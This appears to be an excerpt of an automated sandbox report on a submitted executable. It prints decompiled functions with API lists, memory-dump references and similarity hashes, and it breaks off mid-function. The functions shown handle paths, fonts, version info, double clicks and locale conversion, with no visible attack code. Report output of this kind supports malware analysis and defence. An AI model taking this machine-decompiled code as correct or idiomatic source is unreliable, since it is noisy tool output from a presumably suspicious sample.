                                      • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                                      0x0040541f
                                      0x00405436
                                      0x0040543e
                                      0x0040543e
                                      0x00405446

                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                                      • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3916508600
                                      • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                      • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                                      • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                                      • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000AC10, Relevance: 6.3, APIs: 4, Instructions: 264windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBeep.USER32(00000010), ref: 1000AC39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: BeepMessage
                                      • String ID:
                                      • API String ID: 2359647504-0
                                      • Opcode ID: 6910ef47118801366e84d6d677877baab536c4454372d37540177b44e2fc0040
                                      • Instruction ID: 51122b22d82e93d7578eb9d3e12bec3d74abf3b8d05eaa372307819e9751bcd1
                                      • Opcode Fuzzy Hash: 6910ef47118801366e84d6d677877baab536c4454372d37540177b44e2fc0040
                                      • Instruction Fuzzy Hash: 5CA151B9E00108AFEB04CF94D881FAE77B5EF49385F158168F9059B359D735EA80CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000AF50, Relevance: 6.1, APIs: 4, Instructions: 109timewindowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E1000AF50(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void _v32;
				intOrPtr _t36;
				intOrPtr _t41;
				int _t43;
				int _t46;
				int _t51;
				intOrPtr _t54;
				signed int _t69;

				if(_a8 < 0x200 || _a8 > 0x20e) {
					return 0;
				} else {
					__eflags = _a8 - 0x203;
					if(_a8 == 0x203) {
						L7:
						_t36 = _a8 - 2;
						__eflags = _t36;
						_a8 = _t36;
						L8:
						__eflags = _a8 - 0x201;
						if(_a8 == 0x201) {
							L12:
							_v32 = _a4;
							_v28 = _a8;
							_v24 = _a12;
							_v20 = _a16;
							_v16 = GetMessageTime();
							_v12 = _a16 & 0x0000ffff;
							_v8 = _a16 >> 0x00000010 & 0x0000ffff;
							__eflags =  *0x10023860;
							if( *0x10023860 == 0) {
								L20:
								 *0x10023860 = 1;
								L21:
								memcpy(0x10023884,  &_v32, 7 << 2);
								_t41 =  *0x10023860; // 0x0
								return _t41;
							}
							__eflags = _v28 -  *0x10023888; // 0x0
							if(__eflags != 0) {
								goto L20;
							}
							__eflags = _v32 -  *0x10023884; // 0x0
							if(__eflags != 0) {
								goto L20;
							}
							_t69 = _v24;
							__eflags = _t69 -  *0x1002388c; // 0x0
							if(__eflags != 0) {
								goto L20;
							}
							_t43 = GetDoubleClickTime();
							__eflags = _v16 -  *0x10023894 - _t43;
							if(_v16 -  *0x10023894 >= _t43) {
								goto L20;
							}
							asm("cdq");
							_t46 = GetSystemMetrics(0x24);
							asm("cdq");
							__eflags = (_v12 -  *0x10023898 ^ _t69) - _t69 - _t46 - _t69 >> 1;
							if((_v12 -  *0x10023898 ^ _t69) - _t69 >= _t46 - _t69 >> 1) {
								goto L20;
							}
							asm("cdq");
							_t51 = GetSystemMetrics(0x25);
							asm("cdq");
							__eflags = (_v8 -  *0x1002389c ^ _t69) - _t69 - _t51 - _t69 >> 1;
							if((_v8 -  *0x1002389c ^ _t69) - _t69 >= _t51 - _t69 >> 1) {
								goto L20;
							}
							_t54 =  *0x10023860; // 0x0
							 *0x10023860 = _t54 + 1;
							goto L21;
						}
						__eflags = _a8 - 0x204;
						if(_a8 == 0x204) {
							goto L12;
						}
						__eflags = _a8 - 0x207;
						if(_a8 == 0x207) {
							goto L12;
						}
						__eflags = _a8 - 0x20b;
						if(_a8 != 0x20b) {
							return 0;
						}
						goto L12;
					}
					__eflags = _a8 - 0x206;
					if(_a8 == 0x206) {
						goto L7;
					}
					__eflags = _a8 - 0x209;
					if(_a8 == 0x209) {
						goto L7;
					}
					__eflags = _a8 - 0x20d;
					if(_a8 != 0x20d) {
						goto L8;
					}
					goto L7;
				}
			}

















                                      0x1000af5f
                                      0x00000000
                                      0x1000af71
                                      0x1000af71
                                      0x1000af78
                                      0x1000af95
                                      0x1000af98
                                      0x1000af98
                                      0x1000af9b
                                      0x1000af9e
                                      0x1000af9e
                                      0x1000afa5
                                      0x1000afc6
                                      0x1000afc9
                                      0x1000afcf
                                      0x1000afd5
                                      0x1000afdb
                                      0x1000afe4
                                      0x1000aff3
                                      0x1000b005
                                      0x1000b008
                                      0x1000b00f
                                      0x1000b09a
                                      0x1000b09a
                                      0x1000b0a4
                                      0x1000b0b1
                                      0x1000b0b9
                                      0x00000000
                                      0x1000b0b9
                                      0x1000b018
                                      0x1000b01e
                                      0x00000000
                                      0x00000000
                                      0x1000b023
                                      0x1000b029
                                      0x00000000
                                      0x00000000
                                      0x1000b02b
                                      0x1000b02e
                                      0x1000b034
                                      0x00000000
                                      0x00000000
                                      0x1000b03f
                                      0x1000b045
                                      0x1000b047
                                      0x00000000
                                      0x00000000
                                      0x1000b052
                                      0x1000b05b
                                      0x1000b061
                                      0x1000b066
                                      0x1000b068
                                      0x00000000
                                      0x00000000
                                      0x1000b073
                                      0x1000b07c
                                      0x1000b082
                                      0x1000b087
                                      0x1000b089
                                      0x00000000
                                      0x00000000
                                      0x1000b08b
                                      0x1000b093
                                      0x00000000
                                      0x1000b093
                                      0x1000afa7
                                      0x1000afae
                                      0x00000000
                                      0x00000000
                                      0x1000afb0
                                      0x1000afb7
                                      0x00000000
                                      0x00000000
                                      0x1000afb9
                                      0x1000afc0
                                      0x00000000
                                      0x1000b0b5
                                      0x00000000
                                      0x1000afc0
                                      0x1000af7a
                                      0x1000af81
                                      0x00000000
                                      0x00000000
                                      0x1000af83
                                      0x1000af8a
                                      0x00000000
                                      0x00000000
                                      0x1000af8c
                                      0x1000af93
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x1000af93

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MetricsSystemTime$ClickDoubleMessage
                                      • String ID:
                                      • API String ID: 1405723157-0
                                      • Opcode ID: bf051335b62b91993131671aad62af69c0464c8771127e608fa3c8b888334c06
                                      • Instruction ID: 4743a1a950a993a0a7effd3ffa986fbfad1b616c5df29c54608cd1c298cb966e
                                      • Opcode Fuzzy Hash: bf051335b62b91993131671aad62af69c0464c8771127e608fa3c8b888334c06
                                      • Instruction Fuzzy Hash: 59418C71D0061ADFEB10DF69C8886AE77F1FB443A0F11C629E825AB299C7349D85CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10016843, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E10016843(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000CE78( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E10013A5C( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10010E25(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                      0x1001684b
                                      0x10016850
                                      0x1001686a
                                      0x00000000
                                      0x1001686a
                                      0x10016852
                                      0x10016857
                                      0x00000000
                                      0x00000000
                                      0x1001685c
                                      0x10016879
                                      0x1001687e
                                      0x10016881
                                      0x10016888
                                      0x100168a7
                                      0x100168ae
                                      0x100168b0
                                      0x100168f4
                                      0x10016903
                                      0x10016911
                                      0x10016913
                                      0x10016923
                                      0x10016923
                                      0x10016927
                                      0x10016929
                                      0x1001692c
                                      0x1001692c
                                      0x1001692c
                                      0x1001692c
                                      0x00000000
                                      0x10016932
                                      0x10016915
                                      0x10016915
                                      0x1001691a
                                      0x1001691a
                                      0x1001691d
                                      0x00000000
                                      0x1001691d
                                      0x100168b2
                                      0x100168b5
                                      0x100168b9
                                      0x100168e2
                                      0x100168e2
                                      0x100168e5
                                      0x100168e5
                                      0x00000000
                                      0x00000000
                                      0x100168e7
                                      0x100168eb
                                      0x00000000
                                      0x00000000
                                      0x100168ed
                                      0x100168ed
                                      0x00000000
                                      0x100168ed
                                      0x100168bb
                                      0x100168be
                                      0x00000000
                                      0x00000000
                                      0x100168c2
                                      0x100168d5
                                      0x100168db
                                      0x100168de
                                      0x100168e0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x100168e0
                                      0x1001688a
                                      0x1001688d
                                      0x1001688f
                                      0x10016894
                                      0x10016894
                                      0x10016899
                                      0x00000000
                                      0x10016899
                                      0x1001685e
                                      0x10016863
                                      0x10016867
                                      0x10016867
                                      0x00000000

                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10016879
                                      • __isleadbyte_l.LIBCMT ref: 100168A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 100168D5
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 1001690B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 9d970cf35d58c14656f4e4d88a0c2ea8e95bdc9fb0819011eb18038aea34c680
                                      • Instruction ID: 7833a9f48923a533d51261301a36c179121128e15ef96b58cf55e27fd01ad769
                                      • Opcode Fuzzy Hash: 9d970cf35d58c14656f4e4d88a0c2ea8e95bdc9fb0819011eb18038aea34c680
                                      • Instruction Fuzzy Hash: 2F31A431A00256AFDB11CF75CC44B6A7BE9FF49394F128669E8549F1A0DB31E8D0DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                      0x00401ec7
                                      0x00401ecf
                                      0x00401ed4
                                      0x00401ed9
                                      0x00401edd
                                      0x00401ee0
                                      0x00401ee2
                                      0x00401ee9
                                      0x00401ef2
                                      0x00401efa
                                      0x00401efd
                                      0x00401f12
                                      0x00401f18
                                      0x00401f2b
                                      0x00401f34
                                      0x00401f40
                                      0x00401f45
                                      0x00401f45
                                      0x00401f2b
                                      0x00401f48
                                      0x00401b75
                                      0x00401b75
                                      0x00401efd
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                      • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                                        • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                      • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                                      • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                                      • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10012142, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E10012142(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10012693(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E100121C8(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E1001290E(_t28, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1001284D(_t28, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                      0x10012145
                                      0x1001214b
                                      0x100121be
                                      0x00000000
                                      0x10012152
                                      0x10012152
                                      0x10012155
                                      0x10012170
                                      0x10012173
                                      0x10012193
                                      0x100121a5
                                      0x10012175
                                      0x10012175
                                      0x10012178
                                      0x00000000
                                      0x1001217a
                                      0x1001218c
                                      0x1001218c
                                      0x10012178
                                      0x100121c3
                                      0x100121c7
                                      0x10012157
                                      0x1001216f
                                      0x1001216f
                                      0x10012155

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: b27eb37d8593793b6681418b863e132560dc71e99f8d71fa64f69b92b92cff94
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: 120189B644018EBBCF029F84DC01CEE3F62FF28294B058415FE1859030C232DAF1AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                      0x004054bb
                                      0x004054bb
                                      0x004054c2
                                      0x004054c5
                                      0x004054ca
                                      0x004054dd
                                      0x004054f7
                                      0x00000000
                                      0x004054f7
                                      0x004054e1
                                      0x004054e2
                                      0x004054e5
                                      0x004054e6
                                      0x004054ee
                                      0x00000000
                                      0x00000000
                                      0x004054f0
                                      0x004054f3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004054f3
                                      0x00000000
                                      0x004054d3
                                      0x00000000
                                      0x004054d4

                                      APIs
                                      • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004054C0
                                      • CharNextA.USER32(00000000), ref: 004054C5
                                      • CharNextA.USER32(00000000), ref: 004054D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: dR@
                                      • API String ID: 3213498283-1322173608
                                      • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                      • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                                      • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                                      • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 67%
                                      			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                      0x00401d29
                                      0x00401d42
                                      0x00401d4c
                                      0x00401d51
                                      0x00401d5c
                                      0x00401d63
                                      0x00401d75
                                      0x00401d7b
                                      0x00401d80
                                      0x00401d8a
                                      0x004024aa
                                      0x00401561
                                      0x00402825
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • GetDC.USER32(?), ref: 00401D22
                                      • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                      • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirect
                                      • String ID:
                                      • API String ID: 3272661963-0
                                      • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                      • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                                      • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                                      • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10007580, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 205COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 61%
                                      			E10007580(intOrPtr _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				int _v8;
				int _v12;
				char* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				unsigned int _v36;
				int _v40;
				short* _v44;
				intOrPtr _v48;
				char _v4148;
				short _v12344;
				intOrPtr _t148;
				void* _t209;
				void* _t210;
				void* _t211;

				E1000DF30(0x3034);
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				0x10000000("%08x %p\n", _a8, _a12);
				_t211 = _t210 + 0xc;
				do {
					_v36 = 0;
					if( *(_a12 + 4) != 0) {
						L7:
						if((_a8 & 0x00000010) != 0) {
							_v36 =  *(_a12 + 4) >> 1;
							_v44 = _a12 + 0xc;
							L35:
							0x10000000(_a4, 0, _v44, _v36, _a16);
							_t211 = _t211 + 0x14;
							if( *(_a12 + 4) != 0) {
								goto L37;
							}
							break;
						}
						_v16 = _a12 + 0xc;
						_v12 =  *(_a12 + 4);
						if(_v40 == 0) {
							_v40 = 1;
							if( *(_a12 + 4) >= 3) {
								_t148 = E1000DF5B(_a12 + 0xc, 0x1001a280, 3);
								_t211 = _t211 + 0xc;
								_v48 = _t148;
								if(_v48 == 0) {
									_v28 = 0xfde9;
									_v16 =  &(_v16[3]);
									_v12 = _v12 - 3;
